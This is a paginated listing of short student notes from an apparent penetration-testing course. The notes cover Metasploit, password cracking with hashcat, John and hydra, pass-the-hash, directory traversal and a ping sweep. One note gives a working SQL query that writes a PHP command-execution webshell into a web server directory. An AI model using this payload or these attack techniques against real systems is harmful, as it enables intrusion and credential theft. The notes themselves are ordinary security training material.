Advanced Penetration Testing Notes


service postgresql start service metasploit start msfconsole [view]

By: hcool962 | Related Lesson: Metasploit (part 3) Operation | Modified: July 6, 2017


rm=remove mkdir=make directory [view]

By: bubbad1985 | Related Lesson: Linux (part 3) - Directories, myfile and Nano | Modified: July 6, 2017

Directory Traversal

Solitamente, in Windows, dopo la root directory del web server, si torna indietro di 5 posizioni per la directory c: [view]

By: Giuseppe | Related Lesson: Exploitation (part 3) Directory Traversal | Modified: July 4, 2017

Create file using sql

Tramite la query: select ”<?php system($_GET[’cmd’]); ?>” into outfile ”C:\\xampp\\htdocs\\shell.php” E’ possibile creare una webshell ad hoc (Verificare le webshell disponibili in /usr/share/webshell d [view]

By: Giuseppe | Related Lesson: Exploitation (part 2) SQL Commands | Modified: July 4, 2017


hashcat – another passwd cracker hashcat rules creates multiple different variations of the passwds pipal allows for stats about passwds cracked   [view]

By: sirrush | Related Lesson: Passwords (part 4) Using oclhashcat | Modified: July 4, 2017

offline passwd

off line passwd using the hash from the windows machine (XP/win7) john/johnny works with many hash types even can deal with salts XP uses L/Win7 and up NTLM   some passwd over 14 char can be lost also could show as all uppercase   [view]

By: sirrush | Related Lesson: Passwords (part 3) Offline Password Attacks | Modified: July 4, 2017


online passwd attacks hydra one of the tools very noisy attack allows online attacking bruteforce for multiple protocols and urls [view]

By: sirrush | Related Lesson: Passwords (part 2) Online Password Cracking | Modified: July 4, 2017

password attacks

passwd attacks msf allows for passing the hash since say an admin may go around from machne to machine using the same creds they can be dumped hashdump basically you  can login using the hashes   windows stores a backup since the SAM is usually not [view]

By: sirrush | Related Lesson: Passwords (part 1) Password Attacks | Modified: July 4, 2017


for x in seq 1 254; do ping -c 1 $1.$x  | sed ’s/.$//’ done [view]

By: fox24 | Related Lesson: Programming (part 3) Network Pings | Modified: July 3, 2017

Direct Exploitation

In Kali al percorso /usr/share/webshells vi sono delle webshell nei maggiori linguaggio di programmazione lato server. [view]

By: Giuseppe | Related Lesson: Exploitation (part 1) Direct Exploitation | Modified: July 3, 2017

« First ‹ Previous 1 21 111 119 120 121 122 123 131 221 243 Next › Last »

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

We recommend always using caution when following any link

Are you sure you want to continue?